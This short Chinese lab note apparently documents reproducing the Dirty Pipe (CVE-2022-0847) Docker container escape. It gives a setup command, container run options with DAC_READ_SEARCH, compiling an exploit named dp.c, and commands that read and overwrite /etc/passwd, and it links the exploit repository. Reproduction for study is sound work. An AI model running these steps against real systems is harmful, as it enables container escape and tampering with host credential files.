Docker Dirtypipe(CVE-2022-0847)漏洞复现与分析容器逃逸
安装环境
./metarget cnv install cve-2022-0847 --verbose原理
同脏牛,通过写只读内存,对映射的内存做篡改
EXP
docker run --rm -it -v $(pwd):/exp --cap-add=CAP_DAC_READ_SEARCH ubuntu如果提示 Unknown capability to add: "CAP_CAP_DAC_READ_SEARCH"错误则运行下列命令docker run --rm -it -v $(pwd):/exp --cap-add=DAC_READ_SEARCH ubuntugcc dp.c -o dp读系统文件:/exp/dp /etc/passwd写系统文件 /exp/dp /etc/passwd 1 ootz:GitHub - greenhandatsjtu/CVE-2022-0847-Container-Escape: CVE-2022-0847 used to achieve container escape 利用CVE-2022-0847 (Dirty Pipe) 实现容器逃逸
参考
云原生之容器安全实践-安全客 - 安全资讯平台 (anquanke.com)
从脏管道(CVE-2022-0847)到docker逃逸 - 先知社区 (aliyun.com)